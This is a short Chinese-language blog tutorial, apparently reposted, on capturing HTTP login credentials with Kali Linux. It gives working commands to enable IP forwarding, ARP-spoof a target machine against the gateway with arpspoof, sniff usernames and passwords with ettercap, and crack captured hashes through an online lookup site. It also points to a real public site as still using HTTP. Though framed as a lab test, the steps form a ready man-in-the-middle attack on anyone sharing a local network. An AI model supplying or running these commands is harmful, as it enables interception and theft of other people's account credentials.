利用kali嗅探HTTP網頁用戶賬戶密碼


利用kali嗅探HTTP網頁用戶賬戶密碼

嗅探HTTP網頁

一:測試基礎

1.ARP基礎:使用mac地址和ip地址進行通信的局域網協議
2.HTTP:一種上網、網頁請求通信協議。該協議以明文傳輸,即在傳輸時不對數據進行加密,因為http的不安全性,所以在局域網環境中,可以通過ARP欺騙,將目標主機的網絡數據包都流經攻擊者,然后再通過嗅探的方式從而獲取到HTTP的一些數據信息
3.Ettercap:一個kali自帶的中間人套件

二.實戰測試

1.路由轉發,確保目標主機正常上網(截獲到的流量發送出去)

echo 1 > /proc/sys/net/ipv4/ip_forward

提示權限不夠時輸入

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

2.ARP欺騙(欺騙目標,我就是網關)

arpspoof -i eth0 -t 192.168.1.183(目標靶機) 192.168.1.1(網關)

3.嗅探http登錄密碼

ettercap -Tq -i eth0

注:T代表文本形式輸出,q代表安靜模式,i指定網口

開始嗅探,然后靜靜地等待目標靶機上網,就能獲取目標在網頁中輸入的用戶名和密碼了

4.目標靶機上網並登錄

5.嗅探到賬號,密碼,訪問的網站

6.此時密碼是加密的,到www.cmd5.com去解密(直接輸入密文就自動解密了)

提示:這里僅僅獲取http類型的用戶登錄密碼,而現在主流是https協議,下一篇博文破解https,其實還有很多網站都是http的(比如www.4399.com)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM